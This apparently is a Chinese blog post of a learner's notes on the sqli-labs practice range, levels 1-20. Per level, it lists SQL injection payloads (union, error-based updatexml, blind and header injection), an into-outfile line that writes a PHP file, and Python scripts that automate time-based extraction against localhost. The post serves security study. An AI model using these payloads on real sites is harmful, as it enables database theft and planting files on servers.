【sqli-lab心得】1-22关

最新推荐文章于 2021-12-17 20:14:50 发布
最新推荐文章于 2021-12-17 20:14:50 发布
阅读量160 收藏
点赞数
分类专栏: ctf总结 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chualam/article/details/120325751
版权

第一关

刚安装好 发现写入引号没有报错 原来是忘记关闭magic_quote_gpc了

发现注释符--无法注释掉后面的代码,任然报错,用--+替代解决了,--之所以无法注释掉,是因为与后面的引号连在一起了,而+作空格的作用,把它隔开

常规注入table_name返回Subquery returns more than 1 row,则说明需要改成group_concat(table_name)

账号密码一起注入 group_concat(username,'~',password)

第二关

不需要闭合单引号,这是与第一关的不同,因为第一关参数是字符串型,而第二关是整数型,其他步骤一模一样

第三关

是('id')的形式,提交参数id=-1') union select 1,database(),3%23就行,其他一样

第四关

是("id")的形式,提交参数id=-1“) union select 1,database(),3%23就行,其他一样

第五关

数据不回显,用报错注入updatexml(1,concat(0x7e,(select database())),0)即可

第六关

把第五关的单引号改双引号,其他不变

第七关

按要求玩,肯定是union select 1,2,'<? phpinfo();?>' into outfile "目录名\\new.php",记住是用\\,不过要注意数据库有没有开启secure_file_priv,用命令union select @@global.secure_file_priv查看,注意返回NULL为禁用,

但是我打算换一种玩法

由于是(('id'))的形式,所以'))双重闭合,但是发现不回显,也不能报错注入,只能使用布尔型注入1'))  and if((substr(database(),1,1)='s'),1,0)%23,这个肯定得跑字典的,写个python自动注入吧,我加了sleep延迟注入,poc如下

import requests

from requests.sessions import Request

dic = 'abcdefghijklmnopqrstuvwxyz'

flag = ''

for i in range(1,10):

    for x in dic:

        try:

            requests.get("http://localhost/sql/Less-7/?id=1')) or if((substr(database() from "+str(i)+" for 1)='"+x+"'),sleep(4),0) %23",timeout=3)

        except requests.exceptions.ReadTimeout as e:

            flag += x

            print(flag)

            break

print(flag)

第八关

把上面的url从id=1'))改成id=1'后,一模一样

第九关

同第八关

第十关

把单引号改成双引号,同上

第十一关

基本原理:账号提交admin' and  (select case when (substr(database(),1,1)='s') then sleep(3) else 0 end)#   【其实updatexml也行】

写个poc:

import requests

from requests.sessions import Request

dic = 'abcdefghijklmnopqrstuvwxyz'

flag = ''

for i in range(1,10):

    for x in dic:

        sql = "admin' and  (select case when (substr(database(),%d,1)='%s') then sleep(3) else 0 end)#"%(i,x)

        data = {'uname':sql,'passwd':''}

        try:

            requests.post("http://localhost/sql/Less-11/",data,timeout=3)

        except requests.exceptions.ReadTimeout as e:

            flag += x

            print(flag)

            break

print(flag)

第十二关

除了用双引号闭合外,其他和十一区别不大

poc:

import requests

from requests.sessions import Request

dic = 'abcdefghijklmnopqrstuvwxyz'

flag = ''

for i in range(1,10):

    for x in dic:

        sql = 'admin") and (select case when (ascii(substr(database(),%d,1))=%d) then sleep(3) else 0 end)#'%(i,ord(x))

        data = {'uname':sql,'passwd':''}

        try:

            requests.post("http://localhost/sql/Less-12/",data,timeout=3)

        except requests.exceptions.ReadTimeout as e:

            flag += x

            print(flag)

            break

print(flag)

第十三关

同上,把双引号改单引即可

第十四关

同上,把')改为"即可

第十五关

同上,把"改为'即可

第十六关

加了单引号和双引号都没有结果,直到输入admin") and sleep(3)#

poc同上,把"后买加)即可

十七关

这道题卡住了,看到密码单引号报错了,猜出来了是密码没过滤,但是布尔注入和延时注入,但是好像对update的sql语句无效,百度别人的解法,用了updatexml

十八关

卡住了,太急了,没有好好做,登陆后看到user-agent,可以知道这是注入点,注入'#无效,直到注入两个单引号才成功,用updatexml做,新玩法:' or updatexml(1,concat(0x7e,(select concat_ws(username,password) from (select username,password from users)text limit 0,1)),0) or '

十九关

同上,不过注入点在referer

二十关

同上,注入点在cookie

снυαιαм ιее
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python request-python3的request用法实例
weixin_37988176的博客
11-01 562
requests 是爬取数据最常用的模块,比起 urllib, urllib2, urllib3 这几个单是看名字就晕的模块,requests 不仅功能强大,而且 api 简单易用,使用起来有如丝般顺滑以下用实例演示 requests 的相用法构造 GET 请求In [12]: r = requests.get('http://httpbin.org/get')In [13]: print(r....
sqli-labs第十八详解
金 帛的博客
05-03 4822
SQL注入靶场第十八详解
Python:requests:详解超时和重试
weixin_30532973的博客
12-17 2855
网络请求不可避免会遇上请求超时的情况,在 requests 中,如果不设置你的程序可能会永远失去响应。超时又可分为连接超时和读取超时。 连接超时 连接超时指的是在你的客户端实现到远端机器端口的连接时(对应的是connect()),Request 等待的秒数。 importtimeimportrequestsurl='http://www.google.com.hk'print(t...
requests.exceptions.ReadTimeout: HTTPConnectionPool(host='img.qqzhi.com', port=80): Read timed out.
weixin_33995481的博客
07-31 9267
2019独角兽企业重金招聘Python工程师标准>>> ...
sql-lab 11~20总结(后续持续更新)内含18火狐无法抓到本地包的解决方法
m0_62879498的博客
12-17 2743
十一题的传参方式变成了post传参 但注入方式差不多 判断注入点 ​ 'or 1=1 – q 判断字段数 ’or 1=1 order by 2 – q 判断回显点 ​ ’ union select 1,2-- q 查询相内容 判断库名 ’ union select 1,database()-- q 判断表名 ’ union select 1,table_name from information_schema.tables where table_
sqli-labtxt
07-22
在这个sqli-labtxt文件中,我们预计会找到一系列SQL注入攻击的实战教程,主要涵盖了从基础到进阶的10个不同阶段的练习。 SQL注入通常发生在Web应用中,当用户输入的数据没有被正确地过滤或转义,导致这些...
第三节 Sqli-lab环境搭建-01
09-15
Sqli-lab环境搭建-01 在本节中,我们将讨论如何搭建Sqli-lab环境,包括安装PhpStudy环境、火狐浏览器插件、Sqlmap和Sqli-Lab等工具。这些工具将帮助我们学习SQL注入漏洞检测和利用。 PhpStudy环境安装 PhpStudy是...
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-lab注入练习源码
06-25
Sqli-lab是一个专门设计用于SQL注入学习和实践的平台,它为初学者和经验丰富的安全专家提供了多种级别的练习,帮助他们了解并掌握如何防止这种攻击。 首先,我们来详细了解SQL注入的基本原理。当Web应用程序接收...
windows环境下安装sqli-labs
11-04
首先,我们需要下载 sqli-labs 源码,链接为 https://github.com/Audi-1/sqli-labs。然后,我们将源码解压到 web 目录下,在这里是 www 目录下。 数据库配置 接下来,我们需要配置数据库连接。在这里,我们需要...
sqli-lab靶场18基于post的头部信息报错注入
qq_46527080的博客
12-18 613
知识点 $_SERVER['HTTP_USER_AGENT']。 这是用来检查浏览页面的访问者在用什么浏览器.   其中需要检查用户的 agent 字符串,它是浏览器发送的 HTTP 请求的一部分。   如:var_dump($_SERVER['HTTP_USER_AGENT']);   输出:string(65) "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Fire 通过查看源码看到,是一个insert的语句,我们通过构造updatexml
sqli-labs-master第18、19
m_ing
05-15 1401
第18: http://192.168.89.134/sqli-labs-master/Less-18/ 看到页面提示,和卡提示POST - Header Injection - Uagent field - Error based 后置报头注入-Uagent字段-基于错误和我的ip地址:192.169.89.1. 我们一时没有头绪,那就直接看源代码 又看到 insert语句,他把user-agent插入到了数据库,所以可以从这里下手,而且看的出来是单引号型,接下来开始爆破。 需要使用抓包工具,更改
Sqli-Lab靶场-基础篇笔记
Pr0m1se1n的博客
11-26 1300
SQL注入之联合查询注入&报错注入&SQL文件读取文件写入&盲注
sqli-labs靶场第十八
gou1791241251的博客
12-28 2075
十八有点特殊,后台对输入的账号和密码都调用了函数进行过滤了,所以要转换注入方式,尝试去请求头里面修改信息。 可以尝试cookie注入,user-agent注入,refer字段注入。最终在user-agent字段发现注入点,因为输入单引号或双引号时有报错显示。 这次注入前提是输入的账号密码正确才会去执行user-agent的sql语句。在此次例子用了报错注入的方式进行爆表和爆库。 ...
SQL-Lab 18~22
qq_52921637的博客
03-21 299
less18 第十八我们可以看到,这一是头注入 首先,我们应该在本中加入sql语句:当我们使用用户名:admin 和密码:admin的时候,会出现错误,并显现出IP地址:这是因为,我们在上一修改了密码:当我们使用,用户名:admin 密码:afafa时会显示:(登录成功)此时会出现:你的IP地址和User-Agent :我们可以用post数据包header部的注入,注入点是User-Agent 步骤:设置代理,burp抓取数据包,将数据包寄到repeater然后再使用SQL注入语句即可报出数据库版本
sqli-labs18、19详解
weixin_43061418的博客
09-01 2016
18 对两个输入框都进行了设置,所以只能寻找其他注入点 看到insert语句从uagents插入 我们可以 19 可以看到将uname放在了referer里面 就像18那样去修改Referer里面的就好了
SQLi-Lab练习笔记(18-20)
uh_eng的博客
05-31 162
和上一篇文章一样,这里依然使用了BurpSuite工具修改HTTP报文8 Lesson 18头部注入 若输入的用户名和密码正确,则弹出User Agent的提示。后端对username和password都加了严格的过滤,但是发现有对数据库的插入操作和HTTP头部中的User Agent字段有。又因为回显的信息不会经过数据库,所以只能考虑通过数据库报错带出数据库信息。 exp: User-Agent: ’ or updatexml(1,concat(0x7e, database(),0x7e),1) o
【ctf】php://filter/read=convert.base64-encode/resource=
chualam的博客
11-03 3321
题目中flag在index里 打开后url有file= 发现index.php打开后没东西 于是就用到这个语句 这个语句的作用就是作为一个协议流的中间流 处理其他流 可以作为文件包含漏洞的攻击 至于为什么没有显示flag 肯定被注入掉了 这个协议还可以攻击一些php写入了exit导致无法连接菜刀的问题 把<>这些过滤掉 ...
【ctf】burp抓包不能post解决
chualam的博客
11-03 1611
一个get的数据包想改成post 奈何数据没用flag返回 但是hackbar提交却可以 是因为http消息头中没有实体头 把get改post后 再加上Content-type: application/x-www-form-urlencoded即可
sqli-lab安装
09-05
要安装sqli-lab,您需要按照以下步骤进行操作: 1. 首先,确保您具有Web服务器环境。您可以使用Apache、Nginx或其他适合您的环境的Web服务器。 2. 下载sqli-lab的代码。您可以从GitHub存储库中获取它,链接:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值